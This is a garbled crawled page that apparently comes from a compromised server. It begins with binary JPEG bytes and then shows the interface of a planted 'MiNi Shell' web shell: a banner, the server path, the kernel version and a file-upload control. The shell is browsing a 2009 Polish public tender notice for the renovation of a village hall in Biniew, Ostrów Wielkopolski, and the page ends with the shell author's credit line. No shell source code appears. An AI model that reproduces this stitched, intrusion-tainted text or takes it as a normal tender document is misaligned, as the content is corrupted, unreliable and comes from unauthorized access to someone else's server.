JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090924/330462-N-2009.html

<p class="kh_header"><b>Ostrów Wielkopolski: Rozbudowa, wykończenie oraz remonty świetlic i sal wiejskich, 
w miejscowościach Biniew, Karski i Wtórek, Zadanie 1 - Roboty budowlane świetlica wiejska w miejscowości Biniew, Gmina Ostrów Wielkopolski, 
woj. wielkopolskie.</b><br>
<b>Numer ogłoszenia: 330462 - 2009; data zamieszczenia: 24.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ostrów Wielkopolski , Aleje Powstańców Wielkopolskich 12, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062/7351190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrowwielkopolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa, wykończenie oraz remonty świetlic i sal wiejskich, 
w miejscowościach Biniew, Karski i Wtórek, Zadanie 1 - Roboty budowlane świetlica wiejska w miejscowości Biniew, Gmina Ostrów Wielkopolski, 
woj. wielkopolskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

Realizacja Zadania 1 - Roboty budowlane świetlica wiejska w miejscowości Biniew:

- wymiana stolarki okiennej,
- wymiana stolarki drzwiowej,
- wymiana pokrycia dachowego,
- pokrycie dachu papą,
- elewacja budynku,
- licowanie ścian płytkami,
- ułożenie płytek posadzkowych,
- roboty malarskie,
- wymiana osprzętu instalacji wod.-kan.

Roboty budowlane. 

Szczegółowy zakres robót określony jest w załącznikach do SIWZ, przedmiarze robót, dokumentacji projektowej.
Prace objęte przedmiotem zamówienia muszą być zrealizowane zgodnie ze specyfikacją techniczną wykonania i odbioru robót - w załączeniu.

Oferowane wyroby muszą posiadać certyfikat zgodności z Polskimi Normami, polskimi aprobatami technicznymi. W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy uwzględnia się w kolejności:

1)	europejskie aprobaty techniczne,
2)	wspólne specyfikacje techniczne,
3)	normy międzynarodowe,
4)	inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne. 

UWAGA! Wszelkie nazwy własne materiałów i urządzeń, które zostały użyte 
w dokumentacji projektowej należy traktować jako podane wyłącznie przykładowo, w celu określenia minimalnych oczekiwanych przez zamawiającego parametrów jakościowych i wymaganych standardów wykonania robót. W przypadku zamiaru stosowania materiałów, urządzeń i osprzętu odmiennych od podanych w dokumentacji projektowej, do oferty należy dołączyć stosowne dokumenty (np. karty techniczne), z których wynikać będą informacje producenta o parametrach technicznych urządzeń i osprzętu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.43.12.00-9, 45.44.21.00-8, 45.45.00.00-6, 45.33.00.00-9, 45.26.12.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości - 6.000,00 zł (słownie: sześć tysięcy zł 00/100), w tym:
- część 1	-	roboty ogólnobudowlane	-	3.000,00 zł,
- część 2	-	wymiana pokrycia dachu	-	3.000,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art.22 ust.1 ustawy Pzp. 

1. Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy 
      i doświadczenia,  dysponowania  osobami zdolnymi do wykonania zamówienia oraz 
      sytuacji finansowej i ekonomicznej zostanie ocenione według poniższych zasad :

1)	 Udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych wyszczególnionych 
w SIWZ (z podaniem ich wartości, dat wykonania oraz odbiorców): 
a)	wykażą, że dysponują lub będą dysponować kierownikiem budowy, który posiada uprawnienia budowlane do kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej w zakresie niezbędnym do wykonania przedmiotu zamówienia lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w tym zakresie 
oraz należy (przynajmniej na dzień składania ofert) do właściwej izby samorządu zawodowego;
b)	wykażą, że posiadają środki finansowe na realizację przedmiotowego zamówienia na podstawie informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, którym wykonawca posiada rachunek potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia.

2)	Zamawiający uzna za spełniony warunek w przypadku wykazania 
się Wykonawcy realizacją:

- 		co najmniej 2-ch robót budowlanych - polegających na remoncie, przebudowie, budowie obiektu budowlanego, demontażu i montażu stolarki okiennej i drzwiowej, wykonywaniu elewacji zewnętrznych, licowaniu ścian płytkami, malowaniu pomieszczeń, montażu, demontażu osprzętu instalacji kanalizacyjnej - o wartości nie mniejszej niż: 50.000,00 PLN - każda; 

-		co najmniej 2-ch robót budowlanych - polegających na wymianie pokrycia 	dachów - o wartości nie mniejszej niż: 70.000,00 PLN - każda.

dotyczy to robót wykonanych przez wykonawcę, a nie robót wykonanych przy udziale podwykonawców.

3)	Ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

4)	Jeżeli z informacji banku prowadzącego rachunek wykonawcy będzie wynikało, że  
	wykonawca posiada własne środki finansowe - co najmniej 40.000 PLN lub ma 
      zdolność kredytową do zaciągnięcia kredytu na przedmiotowe zamówienie do 
      wysokości co najmniej  40.000 PLN i więcej, to zamawiający uzna, że wykonawca 
      znajduje się w sytuacji ekonomicznej zapewniającej wykonanie zamówienia.

	Na ocenę spełnienia warunku zamawiający weźmie pod uwagę informację banku, w 	którym wykonawca posiada rachunek bankowy, z której będzie wynikało jakimi 	środkami finansowymi na realizację zamówienia dysponuje wykonawca, względnie 	jaką ma zdolność kredytową.

2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
      spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach 
      (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.

3.  Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie 
      nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału 
      w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia 
      w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega 
      odrzuceniu lub konieczne byłoby unieważnienie postępowania. 

Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej

1.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
	Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1ust.1 
	Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. 
1)	pkt.2, 3 i 5 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a.	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b.	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, nie orzeczono nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności 
lub wstrzymanie w całości wykonania decyzji właściwego organu, nie orzeczono 
wobec niego zakazu ubiegania się o zamówienie, 
c.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2)	pkt.4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego 
		kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie 
     określonym w art.24 ust.1 pkt.4 - 8 ustawy.

2.	Dokumenty, o których mowa w ust.1 pkt.1 lit.a i c oraz pkt.2, powinny być wystawione 
      nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków 
      o opuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
	Dokument, o którym mowa w ust.1 pkt.1 lit.b, powinien być wystawiony nie wcześniej 
      niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie 
	do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

3. 	Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę 
	lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.1, 
	zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, 	właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego 
	lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym 
	wykonawca ma siedzibę lub miejsce zamieszkania. 
	Przepis ust. 2 stosuje się odpowiednio..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 - Wykonawca składa oświadczenia, których wzór stanowi Załącznik Nr 3 do niniejszej SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, 
lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie 
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, 
lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie 
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.	W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:

1)  wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem 
	wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia 
	działalności jest krótszy - w tym okresie, 
	odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym 
	przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz 	załączeniem dokumentów potwierdzających, że roboty te zostały wykonane 	należycie - wykonali:
	- 	co najmniej 2 roboty - polegające na wykonaniu robót ogólnobudowlanych, 
     	  	w przypadku składania oferty na część 1,
 	-	co najmniej 2 roboty - polegające na wymianie pokrycia dachów w przypadku 		składania oferty na część 2.

Załącznik Nr 4  do niniejszej SIWZ część 1,
Załącznik Nr 4  do niniejszej SIWZ część 2.
	
3)	Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania  
robotami budowlanymi przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia w specjalnościach: 

-	kierownik budowy z uprawnieniami budowlanymi - w specjalności konstrukcyjno
-budowlanej,
-	aktualny dokument przynależności do Okręgowej Izby Inżynierów Budownictwa /zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby/,
- 	wykazu osób, którymi dysponuje lub będzie dysponował wykonawca, i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, 
a także zakresu wykonywanych przez nie czynności, 
- 	pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych 
	do 	wykonania zamówienia, jeżeli w wykazie, o którym mowa jak wyżej, wykonawca 	wskazał osoby, którymi będzie dysponował,
-	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi dysponuje 
	wykonawca.

      Załącznik Nr 5  do niniejszej SIWZ, 
w szczególności dotyczy to uprawnień kierownika budowy - w specjalności j.w. oraz dokumentów potwierdzających przynależność wskazanego kierownika budowy do Polskiej Izby Inżynierów Budownictwa.

3.	W celu potwierdzenia spełnienia warunku znajdowania się Wykonawcy w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty dołączyć należy:

1)		Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.  

2)		Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie 
zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, 
że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie 
prowadzonej działalności.
3)	Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym 
		wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków 
		finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 
		3 miesiące przed upływem terminu składania ofert w postępowaniu 
		o udzielenie zamówienia,

4.	Inne wymagane dokumenty:
1)	formularz oferty - Załącznik nr 1;
2)	dowód wniesienia wadium;
3)	dokumenty potwierdzające uprawnienia osób podpisujących ofertę o ile 	uprawnienia te nie wynikają z przepisów prawa lub innych dokumentów 	rejestrowych;
4)	kosztorysy ofertowe; 
5)	projekt umowy zaakceptowany przez wykonawcę - Załącznik nr 7;
6)	pisemne zobowiązanie innych podmiotów do udostępnienia osób, które będą 	wykonywać zamówienie w przypadku gdy wykonawca nie dysponuje takimi 	osobami;
7)	pisemne zobowiązanie innych podmiotów do udostępnienia 	narzędzi i urządzeń   
   niezbędnych do wykonania zamówienia;
8)	oferowane warunki gwarancji - na piśmie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ostrpwwielkopolski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ostrów Wielkopolski Al. Powstańców Wielkopolskich 12 - pokój nr 3..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 08:30, miejsce: Urząd Gminy Ostrów Wielkopolski Al. Powstańców Wielkopolskich 12 - pokój nr 2..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach działania 313, 322, 323, Odnowa i rozwój wsi..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1	-	roboty ogólnobudowlane..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - wymiana stolarki okiennej,
- wymiana stolarki drzwiowej,
- elewacja budynku,
- licowanie ścian płytkami,
- ułożenie płytek posadzkowych,
- roboty malarskie,
- wymiana osprzętu instalacji wod.-kan..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.43.12.00-9, 45.45.00.00-6, 45.33.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2	-	wymiana pokrycia dachu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - wymiana pokrycia dachowego,
- pokrycie dachu papą..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com